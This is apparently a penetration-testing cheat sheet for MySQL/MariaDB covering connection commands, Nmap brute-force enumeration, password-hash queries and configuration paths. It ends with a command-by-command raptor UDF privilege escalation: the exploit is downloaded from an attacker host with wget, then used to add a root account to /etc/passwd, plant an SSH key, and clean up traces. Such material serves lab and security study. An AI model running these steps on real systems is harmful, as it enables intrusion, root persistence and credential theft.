MySQL – port 3306

MySQL database quick reference.

MariaDB is a fork of MySQL and uses similar syntax.

Table of Contents

• MySQL Service
• MySQL Client
• Connection
• Nmap scripts
• Examples
• Privilege Escalation
• Reference

MySQL Service

Start MySQL service on Kali

sudo service mysql start

Stop MySQL service on Kali

sudo service mysql stop

MySQL Client

Installation – Kali

Use the latest mariadb client instead of mysql.

sudo apt install mariadb-client

Installation – Windows

• Download the ZIP Archive of MySQL Community Server for Windows. It contains mysql.exe.
  • Select the latest LTS version
  • Select Microsoft Windows
  • Click on Download for the ZIP Archive
  • Click on No thanks, just start my download
• Extract the ZIP file to the location of your choice
• Add the folder to the PATH, like “C:\Program Files\mysql-9.7.1-winx64\bin”
• You may need Microsoft Visual C++ Redistributable for x64

Connection

On Kali

sudo mysql

Locally

You can also use “mariadb” instead of “mysql” command.

mysql -u <username> -p <database>

mysql -u<username> -p<password> -e 'show databases;'

Remote server

mysql -u <username> -p -h $IP

mysql -u <username> -p -h $IP --port=1234

Nmap scripts

ls -la /usr/share/nmap/scripts/mysql*

nmap -p 3306 --script=mysql* $IP

WL=/usr/share/wordlists/rockyou.txt
nmap -p 3306 --script=mysql-brute $IP --script-args userdb=users.txt,passdb=$WL

Examples

Configurations / Parameters

Variables (configurations?)

Use \G to display vertically (more easily readable).

show variables\G;

Configurations / Parameters

C:\Windows\my.ini 
C:\Windows\my.cnf 
C:\my.ini 
C:\my.cnf 
C:\xampp\mysql\my.ini 
C:\xampp\mysql\my.cnf 
C:\xampp\mysql\bin\my.ini 
C:\xampp\mysql\bin\my.cnf
C:\xampp\mysql\data\mysql_upgrade_info
C:\xampp\mysql\data\user.frm
C:\xampp\mysql\data\mysql_error.log
C:\xampp\xampp-control.ini

#-------------------------------------------------------------------------------
# Configurations / Parameters
#-------------------------------------------------------------------------------
# Never run MySQL as root or as nobody
# mysqld refuses to run as root unless that is specified explicitly using the --user=root option

# Configuration file:
my.cnf

# Start MySQL
mysql.server start

# Stop MySQL
mysql.server stop

# Execute OS commands from within MySQL client
\! ls -l
\! nano
\! bash

# Comments 
SELECT 1+1;     # This comment continues to the end of line
SELECT 1+1;     -- This comment continues to the end of line
SELECT 1        /* in-line or multiple line comment */ + 1;

# String identifier
` or '
 
SELECT * FROM `select` WHERE `select`.id > 100;
SELECT 1 AS `one`, 2 AS 'two';

# List all databases
show databases;

# List all tables
use dbname;
show tables;

#-------------------------------------------------------------------------------
# Write files
#-------------------------------------------------------------------------------
SELECT id,name,email FROM customers
INTO OUTFILE '/tmp/customers.csv'
FIELDS TERMINATED BY ','
ENCLOSED BY '"'
LINES TERMINATED BY '\n'

select 1 from information_schema.tables limit 1 into outfile '/tmp/test.txt';

select distinct table_schema from information_schema.tables;
select table_name from information_schema.tables where table_schema = 'schema found in previous query';
select column_name from information_schema.columns where table_name='table found in previous query';

Users and passwords

Query depends on version…

select user, authentication_string from mysql.user;

select user, password from mysql.user;

Privilege Escalation

Raptor

https://www.exploit-db.com/exploits/1518

Requires gcc on target, unless target is Debian (in this case compile on Kali).

searchsploit -m linux/local/1518.c
### REMOVE LINES AT THE END OF EXPLOIT
python3 -m http.server 80

wget -O /tmp/raptor_udf2.c http://KALI_IP/1518.c

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Change path to create raptor_udf2.so according to “select @@plugin_dir”

mysql -u root
use mysql
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select @@plugin_dir
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('id > /tmp/out; chown myuser.myuser /tmp/out');

Via /etc/passwd

select do_system('echo myprecious:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd');

ssh myprecious@x.x.x.x
[PreciouS]

Via authorized_keys

Can generate a key in the user home on the victim also, this works.

# Generate a public/private key pair
ssh-keygen -t rsa
[leave all default parameters]
chmod 400 id_rsa

select do_system('echo "ssh-rsa ..." >> /root/.ssh/authorized_keys');

ssh -i id_rsa root@x.x.x.x

Cleanup tasks

mysql -u root
use mysql
drop function do_system;
select * from mysql.func;
quit

find / -name raptor_udf2.so

rm /<path to file>/raptor_udf2.so

Reference

• How to install MySQL client on Windows (Simplified Guide)